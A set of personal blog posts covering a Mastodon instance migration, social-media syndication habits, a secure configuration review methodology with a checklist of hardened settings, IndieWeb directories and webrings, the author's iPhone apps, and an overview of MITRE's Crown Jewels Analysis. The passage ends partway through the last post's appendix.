I created my Hetzner account, initialized a decently spec’ed VPS, I got my SMTP relay configured through Sendgrid, set up a Backblaze R2 bucket for block storage, fronted through Cloudflare and then hammered through the official Mastodon installation steps (paired with some other installation guides I came across). I knew it wasn’t a simple install, but it seemed straight-forward enough. I ran through the installation wizard but despite my confidence, things started to awry. Somewhere between the server-side install config and the SMTP-relay config something wasn’t working. I wasn’t receiving my confirmation email to log into the Mastodon admin account I created. I bypassed this little issue by manually activating the account on the back-end using tootctl. So now I’m in my sparkly new instance! But wait, nothing appears to be federating and I am unable to search for or find any other accounts! I searched around for a bit on Google for any clues as to what might be happening but after an hour or so decided to shut it all down and try a different path. Interestingly, after I started deactivating some accounts and tearing down the VPS infrastructure I noticed the emails finally making it through the SMTP relay! I also have a theory that federation/search was borked because I had not properly set up the object storage connection. 🤷‍♂️

So where did I turn? For now, I needed something at least slightly more turnkey. DigitalOcean had advertised a “one-click” droplet for Mastodon hosting solution that seemed appealing and for a moment I considered going that route. But, it still required a fair bit of set-up including hooking up a SMTP relay, object storage, etc… Oh and it was 4-5x the cost (at least) of going back and figuring out how to do it with Hetzner. It was moments after I created the DigitalOcean account and started thinking more about it when I decided to just scale up my existing shellsharks.social instance on Masto.host and evaluate whether it could handle an account with activity on the order of what I typically see with my main shellsharks account on infosec.exchange.

Masto.Host Trial Period: Issues & Observations

Masto.host is incredibly easy to get started with, scale up/down or stop using entirely. As such it was a simple decision (in the end) to trial my main account with it. After sizing up my existing shellsharks.social instance from the Moon to Star tier it didn’t take long for me to see that it would be plenty beefy for an account of my size. Since the pricing is plenty all-inclusive (you don’t need to futz around with object storage, SMTP relays, CDNs, etc…), with all underlying server management handled entirely by Masto.host, I was pretty sold on the idea of moving there. Though the instance itself seemed more than performant, I did encounter a number of other things worth mentioning…

A few notes on Masto.host itself…
- It is scary easy to get signed up and started with an instance with your choice domain…
- Pricing, imo, is very fair. Once you add up all the various costs of self-hosting you really don’t save much from a price perspective by going elsewhere. For what you save in time, I think it’s very worth it.
- Support is lightning quick and very helpful.
- Managing your instance via the Masto.host admin panel is extremely simple. Really not that much to tweak.
- Media storage allottment gets gobbled up pretty quick. I’m at 70% after only a few days. Will have to report back to see how I can manage this into the future…
Federation is a tricky beast and I definitely could not explain how it works. What I can say is that on any Mastodon account, your view of the world/Fediverse is not necessarily 100% complete. On larger instances you will likely see more comments and have access to more accounts than you will on a smaller, “less federated” instance. As such, when viewing user accounts from my personal instance I have only limited information that gets pulled in. I see avatars, follow/follower counts and lists and some posts but likely do not see all of them.
- To address this shortfall, I can typically go to their account directly on their server via my client’s in-app browser, scroll through their posts and if there’s one I want to engage with, copy the link to the post and search for it directly within my Mastodon client. This 99% of the time will allow me to view the post directly and engage.
I occassionally will have a performance hiccup, i.e. something loading slow, but after few days using my account pretty heavily I’d say it’s fine 99.9% of the time. As an example, notifications (likes, replies, boosts) all come in super fast!
One thing I really enjoyed being on infosec.exchange was the Local feed. It was a great place to farm interesting accounts, find one-off posts to engage with, etc… Luckily, Mastodon still allows me to peruse local feeds and as such it is easy enough for me to continue scrolling it and just respond via my new account instead. Ivory doesn’t yet allow me to browse remote local feeds but what I can do is peruse the infosec.exchange local feed on my old infosec.exchange account and just reply from my shellsharks.social account via the account-picker.
Search, which honestly is of varying usefulness even on the largest of servers (i.e. infosec.exchange / mastodon.social), is effectively useless on my personal instance unless I have a direct link to exactly what I am looking for. This has improved over the last few days a bit, but I still wouldn’t rely on basic search on my personal instance to find anything useful.

A Look at shellsharks.social & the Future

So yeah, I’m @shellsharks@shellsharks.social now. Yay!

The migration process from infosec.exchange was pretty good, definitely a bit scary but it was mostly a success. I had a little under 1600 followers to migrate and only had 20-30 of those not get moved over after it was all said and done. This seems to be an issue with hitting a rate-limiting wall either with my server or infosec.exchange’s. Fortunately, I can re-initiate the move in 30 days and migrate over the straggling followers. I had some questions about how account moves worked but this post sums things up pretty well.

I had considered using my “shellsharks.com” domain as my Mastodon instance but after some thinking, decided that shellsharks.social would be best. First, it is a social account, so having the social TLD makes perfect sense. Second, I was concerned about traffic that might be generated due to noisy ActivityPub federation calls which would be directed at shellsharks.com which is sitting on Github Pages and perhaps not ready for that level of traffic.

The biggest downside of having made this move, and using Masto.host, is no longer having the Glitch-soc capability which allowed me to have posts that exceed 500 chars in length. This said, I’ve sorta decided that if I can’t get my point across in 500 characters, it might be worth making a note or blog post on my site and then sharing a link to that instead. This is part of the spirit of the IndieWeb after all!

In the future, I’d like to retry self-hosting. So much of the Fediverse is hosted by Hetzner so I would probably choose that as my VPS provider. I’d like to go with a Docker-based install, for easier management and technological gratification. In fact, there is a lot of things I’d like to self-host in the future (e.g. RSS, bookmarks, blog, etc…). I may even have some ideas for a community-style server, but that’s a ways away.

The world of social media has in some ways gotten so much larger while at the same time somewhat more disconnected as people have spread out across the various platforms of this era. But things have been set in motion to bridge these divides and bring people together once more. In a possible future where those of us in the traditional Fediverse can interact with those on Threads, or on BlueSky, or on Nostr, or wherever, I really liked the idea of establishing my unique, forever-social-identity within the Fediverse.

Regardless of where I am now or where I go in the future, you should always be able to @ me on the Fediverse by @’ing @[whatever]@shellsharks.com. Thanks to the magic of Webfinger, this will redirect ActivityPub messages to whatever is my current main Fediverse account. Cool stuff!

Many thanks to Masto.host for making this possible and so painless!

Accounts

Here’s a quick breakdown of the accounts I have planned for shellsharks.social and how I’ll be using them.

shellsharks@shellsharks.social - My main account.
afterdark@shellsharks.social - Late-night sillies, shit-posting, meta-commentary.
Site@shellsharks.social - I am considering standing up an account that simply posts updates that are made to the site.
mike@shellsharks.com - Reserving this name in the event I want to migrate my “general” account from mastodon.social.

Thanks to infosec.exchange

I know this post is about where I am now, but I think it’s worth taking a minute to wax poetic about infosec.exchange. It was afterall, the incubator in which I became such a proponent of the Fediverse, learned so much about the IndieWeb and where I met hundreds of cool, like-minded tech and infosec people. If you are in infosec (especially), I can’t recommend a place to be social more than I would recommend infosec.exchange. Though there are some other infosec-related servers out there, (and they are in their own right great) there is no comparison to infosec.exchange. Jerry Bell, the owner, admin and proprietor of infosec.exchange (and a ton of other Fediverse properties) is (and I’ve said this so many times over the last year+) mind-bogglingly attentive, extraordinarily compassionate, technologically gifted (I mean his ability to run so many Fediverse servers blows my mind), and honestly seems like a really nice person (I’ve not had the pleasure of meeting him). He’s created a very welcoming space and is always looking at how to improve server performance and keep the community happy and engaged. It is so great in fact, that I still fully scroll the infosec.exchange Local feed multiple times a day to find new things to engage with and new people to follow. My old account (though it has a moved-to/redirect) is still there and you can peruse my year+ worth of posts if you wanted to see how much fun I had in that time. (Alternatively I have turned my toot archive into a scrollable page.)

So I'll just say, Thanks for everything Jerry. Your hard work in bringing the Fediverse to so many does not go unappreciated. 🧡

Some other random things/links

Shellsharks Syndication Strategy

Mon, 20 Nov 2023 09:54:00 -0500

One core strategy of the IndieWeb is syndication, i.e. cross-posting content to & from your site between other destinations / platforms / social networks. There are two approaches to syndication—POSSE (Post Own Site Syndicate Everywhere) and PESOS (Post Everywhere Syndicate Own Site). With POSSE, you post on your site first and then syndicate everywhere you want to cross-post, and with PESOS you’re using networks as you traditionally would but replicating content back (i.e. reverse syndication) to your site to maintain a copy.

This page walks through the Shellsharks syndication workflow and philosophy, as well as the places on the web I typically syndicate content. To learn more about the many types of content I publish, go here.

Syndication Destinations

Here’s a list of places I typically share content to.

shellsharks.com: This is the origin for a lot of my content but also where I reverse-syndicate some posts that originate from elsewhere on the web.
Mastodon / the Fediverse: Many (but not all) microblog posts come back to this site as notes. I share a lot of my original posts here to the Fediverse.
Threads: I use this sparingly, but sometimes I will post links to my content from here on Threads.
Lemmy / Kbin: I share content to, and occassionally pull content back-from, the threadiverse.
Pixelfed: I don’t share _ lot of photos, but if/when I do, I will put them on Pixelfed.
Discord: I’m in a ton of Discord servers, I definitely share some links to my site there.
Bluesky: I’m not particularly active on Bluesky, but I will occassionally share links there.
Reddit: I’ve mostly given up here for now.
YouTube: I shared a video once. Any future videos might go there too. 🤷‍♂️
Other (e.g. LinkedIn, Matrix, Nostr, Squabblr, etc…): I share a lot of links out to these various places.

Syndication Philosophy

How do I cross-post content and why do I feel the need to “syndicate” content in this way? Here’s a ramble-tastic explanation…

I reckon less people than ever use straight-up bookmarks to save and revisit websites they enjoy. These days, social media is how people discover and consume content. It would be great if everyone had an RSS aggregator and subscribed to the many things I publish here using that, but the reality is the majority of people don’t even know what RSS is. So, if I want people to find my site or read my writing, I need to be where said people are—and these days people are all over the place. Unless I syndicate to multiple places, I just won’t reach ~everyone. Therefore, I need to publish my stuff to a bunch of places.

What happens when a platform dies? Many people are finding out as “X” (f.k.a. Twitter) burns. The communities you’ve built, your social “graph” and your content that is on these platforms all go up in flames as well. If you build a site, keep copies of your content there and establish yourself identity on the web as your site’s domain, rather than your @ handle on whatever social platform, you can better retain your “following” in the wake of said social platform’s death. Backlinking to your site within your social media posts is a great way for people to associate you with your site, rather than just your @ handle. Establishing this fixed, long-term identity on the web is very important. Platforms come and go, but in theory a domain you purchase and establish can be a way for people to find you indefinitely.

This is one thing about Bluesky that I really like. They introduced a way to make a domain you own your handle. So on Bluesky, I am shellsharks.com. Cool! The WebFinger protocol offers another interesting path for facilitating a persistent social identity. I’ve set up the WebFinger endpoint for my site so now when you search for “shellsharks.com” (my site’s domain) on Mastodon, my primary Fediverse profile will be the search result. It would be cool to see more sites support something like IndieAuth for authentication/identity. You could use your site as a source of identity rather than having to fight for @ handles on every new platform that pops up.

Speaking of the disaster that is X, especially for content creators, consider now that X has taken a hostile position against external links, preventing discovery or even existence of links that would send you away from the site. This is among many other things that make X utterly uninhabitable. This sort of late-stage, dystopic platform lock-in prevents people from being exposed to the larger open web.

Content ownership is a foundational tenant of the IndieWeb, and for good reason! When all your content exists within someone elses platform you lose a lot of control. Platform death could mean the loss of all your content. You are subject to questionable content moderation policies that could result in your content being removed or suppressed, and of course you allow these companies to profit off of and get credit for your work rather than yourself.

So what’s my strategy? Do I simply write / publish something on my blog and then link to it on every destinaton platform the exact same way? Nope, it’s a bit more nuanced than that, and as a result, does not have a lot of automation tied to it at this time. There is a lot that I consider when determining if and how I will syndicate content to a particular destination. Who is my audience? For example, if I’m posting a note about my favorite accounts to follow on Mastodon, I probably wouldn’t post it on Threads. Each platform has their own culture / norms—for example on Mastodon, I may use hashtags to help with discoverability, but with Threads I would not. Mastodon is a more technical crowd so I may reserve more technical content for that site. A lot of micro-blog-esque social media (e.g. X, Threads, even vanilla Mastodon) allow for only a couple hundred characters in a post. This means any syndicated content is typically just a summary and a link to the full post rather than dropping in the full content in the post itself. When I have something to say, it’s too-often >500 characters, so sharing via a link to my site is really the only way to go. To capture association between a post on my site and where I have syndicated it to, I have a mechanism on the site to drop the direct-links to social media posts on the blog post source so that the syndication links show up at the bottom of each post.

So does everything I post get syndicated out? Does everything I post first on social media get reverse-syndicated back to the site? No and no. There are some things on the site that are experimental, more personal or just don’t easily fit into other spaces. For those posts, I leave them on the site for my own reference and for those who like my content enough to have either subscribed to the RSS feeds or peruse my site intermittently. As for my social media reverse syndication, I have no formal rule for this, but I tend to only publish things on my site that originated from social media if A. it’s decent reference material, i.e. I would want to go back to it or update it at some point, B. It get’s a lot of attention and becomes worthy of archival, or C. it’s a longer or more thoughtful post. 99% of the time, these posts become notes on my site. This applies to replies as well, not just original posts by me.

I mentioned that I don’t use a lot of automation in my syndication methodology. This is in part because I haven’t spent the time to automate any part of the workflow, but equally it is because of this nuance in how I want to share my content. I rarely, if ever post the same content in the same way across multiple platforms. Therefore, I can’t really rely on an automation that would take a newly published blog post or note and simply repost it verbatim everywhere else. Another important aspect of not automating this sort of thing is that for anywhere I want my content to go, I really want to be a citizen of that platform. Rather than blasting a link to my site everywhere, I’d rather hand-post it and then interact with replies. Further, by being someone who actively scrolls these feeds, I get a better feel for how I should post things, what would be interesting to those on the network, and how I can more contextually post my content as replies to other peoples posts. For example, my first-ever post on this site was on how to get into infosec. My social networks happen to be filled with infosec professionals and aspiring pros who frequently asked about how to get into the field. There’s my opportunity to reply with a link to that post! I’ve said this before, boosting engagement on social media is more about how you actually engage with others, rather than expecting mass response to your own original posts.

The IndieWeb actually has its own “social” capability—Webmentions. Shellsharks.com hasn’t implemented Webmentions for technical and non-technical reasons. Getting it to work via Github Pages/statically generated Jekyll is not for the faint of heart. More than that though, I don’t see Webmentions being particuarly viable in its current form—moreso just a checkmark for IndieWeb superfans or those that really despise the idea of using any traditional social media platform. One thing Webmentions and the technology that facilitates it supports is the concept of bridging post replies back to your site in the form of a comments feed. For me, this would be bad. I don’t want a bunch of comments junking up my post, nor do I really want to be made painfully aware of posts that never received any engagement (haha). Further, having comments on my site means having to perform moderation—no thanks. IndieWeb zealots also believe in having other post metadata available directly on the site of origin—things like likes and reposts. Again, more unncessary cruft. I think having links to where you’ve syndicated content is sufficient. By going out to the platform a syndicated post lives on you can easily see the likes and resposts.

There ya go! This is how and why I syndicate shellsharks content across the web.

Syndication Workflow

A walkthrough of my (POSSE) syndication approach.

I write the blog post / note / thing here (duh).
Since I use GitHub Pages, the content is published by committing it to the repo on GitHub.
I have frontmatter on my post for where the content is syndicated to. At first, this is left blank.
Once the post is published, (if) I share the the post on a social platform.
The syndicated post will (most of the time) include a back-link to the source post on my site.
Once the syndicated post is published, I copy the direct links to each and include them in the frontmatter for the original post on my site.
I then have to recommit the post with the syndication link in the front matter.
The syndication links then appear at the bottom of individual post on my site. Ta da!

For PESOS it is a similar, but slightly tweaked approach.

I share some sort of content on somewhere on the web.
I copy that content into the appropriate type of post for my site.
I include the link to the original post on the respective social platform in the front matter of the post on my site.
I commit the post to my site’s GitHub repo and it goes live within minutes!
The syndication link is immediately available on the bottom of the live post.

The Vergecast’s podcast episode “The poster’s guide to the new internet” provides some historical context regarding the challenges facing modern syndication strategies with respect to the “IndieWeb”. I recommend listening as it is very interesting and educational!

Secure Configuration Review

Fri, 27 Oct 2023 21:46:00 -0400

A secure configuration review is an evaluation and verification of configurable settings within a composite system. In scope for this type of assessment are system settings that are modifiable by a user, an admin user or the system vendor. Specifically, system settings that have an impact on the overall security posture of the system are assessed to determine what the most “secure” state is and whether it is secure-by-default (or similarly secured-by-design). This is in contrast to other types of security assessments that seek to identify design flaws or traditional vulnerabilities which are fixed by code changes or architectural adjustments, rather than simple application-level toggles/tweaks.

Secure configuration reviews are typically conducted as part of a wider portfolio of security assessment activities (e.g. threat model, penetration test, design review, etc…) prior to system “go-live”. This review is ideally revisited directly before the system is promoted to production to ensure configurations are in fact in the previously determined/attested secure state. (* Note: I refer to this as a “Pre-Launch Security Review”, the effect of which is commonly found in heavily change-managed environments, albeit under a different name.)

Security misconfigurations are prime targets for threat actors due to their commonality and ease of discovery. To explain - If a threat actor has access to an instance of the system, they can easily enumerate all possible attack vectors and vulnerabilities that manifest due to misconfiguration. As for their commonality, misconfigurations are frequent due to human error, usability-over-security demands, and insecure defaults, among other things.

With that primer out of the way, let’s walk through a methodology for conducting secure configuration reviews.

Conducting a Secure Configuration Review

The steps for conducting a secure configuration review are documented below. Consider the mnemonic “ICECAP” to remember the sequence!

Identify and profile the system to be reviewed. The profile should include basic pre-assessment information like technical PoC, data classification in-scope, externality, business purpose, etc…
Collect artifacts and access needed to perform the assessment. This would ideally include a plan from the implementor where they have documented how they intend to configure/secure the system.
Enumerate security-related configurable settings within the system by leveraging access to the system and (hopefully) full documentation. For each identified config, document the default/by-design state and what the most secure state would be, paying special attention to settings that are insecure-by-default. Remember that different settings will be exposed depending on your privilege/user-context. This will ultimately yield a secure configuration baseline.
- For security-related settings you don’t find configurable within the system interface, and that you are particularly concerned with, consider asking the vendor whether it is configurable in the back-end by the vendor themselves. If not, you can atleast ask (or test), and document what the hardcoded setting is. In some cases, it may be easier to ask a blanket statement around what settings may only be toggleable by the vendor. They may also be willing to provide a vendor-written hardening guide for their platform or share what insecure-by-default settings they are aware of.
Compare the implementors planned configuration/design with the secure configuration baseline developed in the previous step. For any deltas, work with the implementor on either mitigating misconfigurations or documenting the risk of a less-secure configuration.
Attestation should be obtained from the implementor stating the intended configurations are in adherence with organizational policies (logical/non-technical controls) and any applicable, approved risk exceptions. This can be attached to the assessment case.
Optional: Pre-Launch Security Review (PLSR) is conducted directly before the system is promoted to production as one last assurance step, confirming agreed upon configurations are in place.

* Consider that secure configuration reviews typically identify settings within a system that are configurable to either a more secure or less secure state. Assurance around whether these states do in-fact provide heightened security is typically left to security reviews that dig deeper into the functionality of the system (i.e. penetration test).

Requisite Assessment Inventory

The list below contains the artifacts, documents and access(es) typically required to conduct a proper secure configuration review.

System architecture diagrams
System security/hardening/implementation plan from the implementor(s)
User/Admin guides/documentation
Technical PoC from the vendor/developer/implementor to ask questions
Access to the platform (user and admin privileges)

Configuration Contexts

Configurable settings within a system/platform are exposed in a variety of contexts, each with differences in terms of what is exposed and who has access to modify them. These contexts are described in the list below.

User - Settings configurable by a normal, non-privileged user.
User-Admin - Settings configurable only by privilieged/administrative users of the system.
Vendor - Settings configurable only by the vendor, typically in a back-end console via flags, etc…

* Consideration: There may be configurable settings unique to each node/sub-system of a composite multi-tier system/platform (i.e. settings in the front-end web/app server as well as on back-end databases, etc…), so remember to walk through each distinct sub-system in-scope.

The list below includes common security-related configuration settings to evaluate when conducting a secure configuration review coupled with a description of an expected “secure config state”. This list is non-exhaustive, as other security settings may be exposed and configurable within the respective system under review.

System version - Latest version / fully patched
Encryption at-rest - Enabled (i.e. full disk or file level)
Encryption in-transit - Enabled at TLS 1.2+, E2E
Error handling (e.g. stack traces, overly-informative messages) - Disabled
Verbose logging - Disabled
Debug/developer modes - Disabled
Unnecessary features (e.g. documentation, files, sample apps, configs, features etc…) - Disabled or removed (to reduce overall attack surface)
Default accounts and/or credentials - Account(s) deleted or password(s) changed
Account privileges - Ensure users are granted appropriate, non-excessive privileges adhering to principle of least privilege
HTTP security headers - OWASP HTTP Security Header recommendations
Network configuration (e.g. isolation/segmentation/ACL/inbound/outbound) - Adhering to principle of least privilege
Authentication - Enabled and strictly enforced at internet boundary and between subsystems or trust boundaries
Authorization - Enabled and strictly enforced at internet boundary and between subsystems or trust boundaries
Compiler flags (e.g. buffer overflow, DEP) - Enabled
Password security (e.g. complexity, clipping, lifespan, recovery/reset etc…) - NIST SP 800-63B Digital Identity Guidelines, and/or adhering to corporate password policy
SSO - Enabled via federated identity
CORS policy - OWASP HTML5 Security | CORS
Session management - OWASP Session Management recommendations, but more specifically enforcing reasonable session timeout and no concurrent sessions
2FA/MFA - Enabled for all external facing services
Telemetry (e.g. sending logs, crash dumps, etc… to vendor) - Disabled where possible
Storage - Understand and risk model where user uploaded files are stored
Other… (Don’t stop there! Other settings may be exposed)

References & Resources

Security Misonfiguration Standards

Below is a list of industry standards related to security misconfiguration.

* After writing and saying “misconfiguration” in my head so many times, it has lost all meaning.

IndieWeb Assimilation

Sun, 16 Jul 2023 15:00:00 -0400

I’ve been a huge advocate for independent blogging for a while now, both for personal and professional reasons. In fact, I’ve written countless replies to early-career folks about documenting their learning journey via a blog. Since I first founded shellsharks (circa 2019), I’ve devoted a fair bit of time not only to writing “content” but also into a lot of little features that, to me, collectively gave the site depth as well as that sense of “having everything a site should have”. Some of these features include, an RSS feed, robots.txt, humans.txt, security.txt, about page, tags, search, change log, license & disclaimer and more. I’ve poured my creativity, whimsy and mind into the aesthetic, writing and functionality of the site and as a result it has served as an ever-present source of identity and pride for me on the web.

Recently, I was introduced to the concept of the “IndieWeb” (or small web), a “people-focused alternative to the corporate web”. Intriguing right? My curiosity piqued, I soon discovered IndieWeb.org, an organization dedicated to the proliferation of IndieWeb resources, guides, community and more. They describe the IndieWeb as…

…a community of independent & personal websites connected by simple standards, based on the principles of: owning your domain & using it as your primary identity, publishing on your own site (optionally syndicating elsewhere), and owning your data. ¹

Sound familiar? Sounds kinda like what I’ve been doing with my site for a while now! But what makes the IndieWeb special? Why should you or I care? Is there anything else to it? Read on to learn more!

IndieWeb

The IndieWeb (or “small web”) is a collection of people-focused websites which share a core set of principles. The IndieWeb is not simply a missionless multitude however, the IndieWeb movement is all about reclaiming the web by de-centralizing what has become all too centralized, encouraging ownership (of your site and your content), and bringing a truer sense of fun and individuality back to the Internet. So why is the IndieWeb important? I’d suggest reading the following pieces by Dan Gillmor, Jamie Tanna & Ariadne Conill, as they do a far more eloquent job than I probably would in explaining this. ^{1, 2}

I’ve previously made known my reasons for blogging, but now with a better understanding of the IndieWeb, and what’s at stake if we don’t embrace it, I now recognize that my infinitesimally small slice of the Internet guarantees me an incorruptible continuum for my content and my identity on the web. (Check out my IndieWeb.txt file!)

Awesome! Now that we have a rough understanding of the IndieWeb ethos, let’s cover what is in my mind the principle mechanics of the IndieWeb.

Principle Mechanics

Looking to be part of the IndieWeb? You don’t need much. Here are (imo) the three core tenants of an indie site. If your site has these two things, congrats! You are part of the IndieWeb.

Domain Ownership: Your site is hosted at a domain you own.
Content Ownership: Your content and writing is under your control (i.e. you have local or secondary backups).
Individuality: The site is about you—your writing, your content. You are free to personalize the site’s design as you see fit.

The Delightful Small Web

The Internet is vast, yet collectively we spend most of our time these days (sadly) within boring, behemoth, centralized corporate-web watering holes. Beyond the corporate web lies countless relics of the old web, unique destinations of the IndieWeb and delights of the small web.

Webrings

A webring is a collection of websites that are linked together, each pointing to and from another site in the ring. They serve as a fun way to build community and facilitate discovery of new sites! Some Webrings and -related resources are provided below.

Webring List
Public Interest Tech Webring by Bill Hunt (Join! or host your own with webring-starter)
webring.xxiivv (per @IPXFong@mastodon.sdf.org)
Webring Enthusiasts of the Fediverse (Shellsharks is on there!)
Fediring.net
Webrings | sadgrl.online - A collection of Webrings.
Weird Wide Webring
🕸💍.ws
merveilles wonder webring
Draconic Webring
geekring
Alterhuman Summoning Circle
silly city
generation Lissa
a11y-webring.club
Hotline Webring
Retronaut
MageRing
MelonLand Surf Club
Muhokama
Static.Quest
Meta Ring
Entralink
LOW TECH WEBRING

Explore the IndieWeb

The sites below are ways to discover, explore and find the sites of the IndieWeb

/page Directories

Learn more about “slash pages”.

About Ideas Now - Directory of /about, /ideas & /now pages
/AI Page Directory - Directory of /ai pages
Ye Olde Blogroll
Citations(.css) Directory
App Defaults
Hello Pages
The /interests Directory - Directory of /interests pages
Bukmark Club
NowNowNow - Directory of /now pages
The /now Garden
Top Four
Uses.tech - Directory of /uses pages

IndieWeb Delights

Other fun discoveries of the IndieWeb are provided below.

My Favorite Indie Sites

All of my favorite sites are now in one place, in my Blogroll!

Hosting

Being on the IndieWeb means first hosting a site. Here are some good Indie options.

Write.as
omg.lol
Pika (from Good Enough)
Yay.Boo (also from Good Enough)
mmm.page
Ghost (and Outpost.pub) 🇸🇬
Web 1.0 Hosting 🇫🇮
Posthaven
Scribbles 🇵🇱
prose.sh | pico.sh 🇩🇪
Bear 🇳🇱
Nekoweb 🇩🇪
Mataroa 🇩🇪
Smol Pub
Montaigne
Haven
Glitch
pages.casa 🇫🇷
LMNO
Teahouse Hosting

References

Resources

The Rebel Web
Resources List for the Personal Web
FeedLand
IndieWebify.Me
smolweb
Resources List for the Personal Web
WebDev Finds Box
Indie Map
An indie web primer
Diagram.website - Map of the IndieNet
IndieWeb Guide
Webdev.yay.boo
No CSS Club
Unplatform
Writing Challenges
Brennan’s IndieWeb Themes, Tools, and Resources

What's on my iPhone

Sat, 15 Jul 2023 06:00:00 -0400

For some reason I really enjoy what’s on my iPhone posts from other people, so I’m going to do one of my own. Behold! What’s on my iphone

“Calendar” Stack [full-width, top]
- Calendar.app Up Next (Apple’s stock calendar widget has the best multi-day event view)
- Fantastical Date + Calendar
“Assorted” Stack [half-width, left-side]
- Clock.app City (DC)
- FoodNoms Goals Summary
- Stocks.app Watchlist
“To-Do” Stack [half-width, right-side]
- Reminders.app Today List
- Reminders.app Grocery smart list
Avelon (My new go-to threadiverse browser)
Ivory (Best Mastodon client imo)
Reeder (I love RSS)
Obsidian
Simplenote
Copilot (So long Mint)
1Password
“Social” Folder (omg I have so many social apps. Apps below are just what’s visible in the 3x3 mini-folder.)
- Google Voice
- LinkedIn
- Discord
- Threads
- Bluesky
- Damus
- Reddit
- Ice Cubes
- Mammoth

Tray

Phone
Messages
Safari
Proton Mail (I am moving off of Google)

Crown Jewels Analysis

Fri, 14 Jul 2023 06:00:00 -0400

Over the years I’ve seen an evolution with respect to how the infosec industry approaches corporate security. In the (my) beginning, it was very asset/defense-centric - What do we have? Patch all the things! Turn on all the blinky security appliances. Next, we added a new layer that was more attacker/threat-driven - red teaming, threat modeling, threat intelligence, etc… So what’s the next advancement? How can we build upon these disciplines in a way that helps us further prioritize and ultimately mitigate risk? Consider now a business-focused, or better yet, mission-oriented approach to security. Rather than focus on potential operational impacts from the perspective of known threat actors or working on a bottomless approach to defense-in-depth, let’s instead orient ourselves around what is important to us (in the context of the respective organization) and define key mission objectives in which to center our security strategy. This is in fact step one of MITRE’s Crown Jewels Analysis (CJA), a process designed to identify cyber assets most critical to the accomplishment of an organization’s mission.

As the name implies, one product of a completed CJA is a list of key assets (the “crown jewels”) which represent the most important atomic constructs your organization relies upon. In the absence of any other output, you could take these identified systems/assets as a prioritized queue and feed them into traditional security models such as defense-in-depth (defensive model) or threat modeling (offensive model) and quickly see the value. But the CJA also yields a dependency map, which illustrates a hierarchy of nodes and relationships that explains not only the technological/process dependencies your mission objectives rely on but can be leveraged to build far more insightful views including (but not limited to) where to apply security controls or where attackers may find weak spots to disrupt operations through nth order effects. ^{1, 2}

Before diving into the more fine-grained mechanics of the CJA, here is a summarization of the assorted benefits you could expect as a result of performing one…

Facilitates joint conversation among key stakeholders. Breaks down assumptions and supports greater understanding of the mission
Promotes balanced resource allocation between business innovation and security safeguards
Prioritizes security investments
Identifies true risk and business impact posed by potential compromise/degradation
Determines acceptable levels of residual risk associated with each critical asset
Establishes security countermeasures to effectively manage business risk profile ^{5, 7}

MITRE Crown Jewels Analysis (CJA) Process

Crown Jewels Analysis (CJA) [SEG, pg. 167] is a methodology designed by MITRE to identify the cyber assets (“crown jewels”) most critical to mission accomplishment. It consists of three distinct steps. ²

Establish Mission Priorities
Identify Mission Dependencies
Mission Impact Analysis

* MITRE’s CJA is often used as an input into MITRE’s threat modeling and risk analysis model, TARA. Together, the CJA and TARA compose MITRE’s Mission Assurance Engineering (MAE) process. (I will not cover TARA/MAE much in this post.)

Ultimately, by increasing the work factor for an adversary and coupling security decisions with a more intimate understanding of mission priorities, an organization can better endure the constant barrage of attacks present within the modern threat landscape and build more robust operational resiliency. ²

Establish Mission Priorities

Step one of conducting a Crown Jewels Analysis is to identify and establish mission priorities. This is an area of MITRE’s CJA documentation that is curiously light. The question is simple though, “what is important to your organization?” My recommendation? Start locally, within the security team, and brainstorm a list of probable objectives. If this is a challenging exercise for the team, it is an opportunity to reach outside the security silo, learn more about the business and become far more effective at practicing business-aware security moving forward. For a more authoritative perspective on key mission priorities, consider approaching security leadership, broader IT leadership or go directly to the source and invoke business leaders themselves. ²

Once we have established what the priorities of the business/organization are, we can begin constructing the map of interconnected tasks, functions and assets which comprise the dependency tree.

Identify Mission Dependencies

Step two of the CJA is to identify mission dependencies. For this, MITRE prescribes a technique for dependency mapping, a (moderately rigorous) adaptation of the Risk-to-Mission Assessment Process (RiskMAP). The Dependency Map is a graph/tree built using mission priorities/objectives as the root/top-level parent nodes, then child nodes are linked using the following mapping “If <child> fails or is degraded (as defined by the SMEs), the impact on <parent> is <failure, degrade, work-around, nominal>.” Once complete, it is possible to analyze the impact of an asset/process failure/degradation through cascading if/then statements. ²

* A more rigorous approach to dependency mapping can be adapted using the Cyber Mission Impact Assessment (CMIA) process. ⁴

Consider the following when identifying potential crown jewels/key processes. System design details influence “criticality” in ways that developers (not operators) will more readily understand, so identifying key system accounts, critical files, and other critical assets will require technical insights from the development team. Deciding which cyber assets are most important to “protect” is based on the insights provided by the dependency map “linkage” to the Tasks and Mission Objectives. CJA can provide insight into which nodes to protect, what security controls to apply and where and how to apply them. ²

CAIP

One tool which can be used to facilitate critical asset ideation is the Critical Asset Identification Process (CAIP), brought to us by DODIG-2013-119. The report provides the following guidance for identifying and prioritizing critical assets. ³

Break down missions and functions into required tasks, standards, and capabilities
Identify the task assets that support the missions to the required standards and capabilities
Prioritize the assets identified based on the criticality of the mission and the availability of other assets that could satisfy required standards and capabilities

Mission Impact Analysis

Once mission dependencies have been identified, the third and final stage of the CJA can commence, the mission impact analysis. The dependency map depicted below demonstrates how failures/degradation of a (cyber) asset results in compromise of upstream information assets, tasks, functions and potentially entire missions. ²

Employing a graph-based mission dependency model can help show the transitive (nth order) mission impacts of cyberattacks. For example, a graph traversal query can begin at the victim host of an attack, and traverse the graph (vertically) to enumerate the mission components that depend on it, showing impact on all effected levels of the mission dependency hierarchy. After modeling a larger volume of potential attacks, common critical pathways will emerge which represent high probability vectors attackers tend to gravitate towards (“gravitational nodes”). A query could also traverse in the opposite direction, e.g., to show the “cyber key terrain” supported by a given mission component. Moreover, a mission dependency model could include important semantics such as relative criticality, ownership, geographic location, etc… ^{6, 8}

For describing criticality of an asset in the context of the mission, consider MITRE’s SCRAM Criticality Levels (listed below). ⁸

Level I: Total Mission Failure
Level II: Significant Degradation
Level III: Partial Capability Loss
Level IV: Negligible or No Loss

The mission impact analysis should yield insights into which nodes, specifically which cyber assets (leaf nodes) result in the most catastrophic mission failure upon compromise/degradation. These are your crown jewels.

Appendices

Courses of Action

When performing mission impact analysis, consider resource allocation in the context of risk mitigation. The list below summarizes courses of action for mitigating potential weaknesses identified in the dependency map. ⁸

Technical – redundant or spare cyber assets
- Replace: Can the cyber asset (e.g., system, network) be replaced with redundant components (e.g., spare servers, redundant network paths)?
- Reconstitute: Can the cyber asset be reconstituted? For example, can the system replicate a server instance from a gold master virtual machine image, or dynamically reconfigure the network.
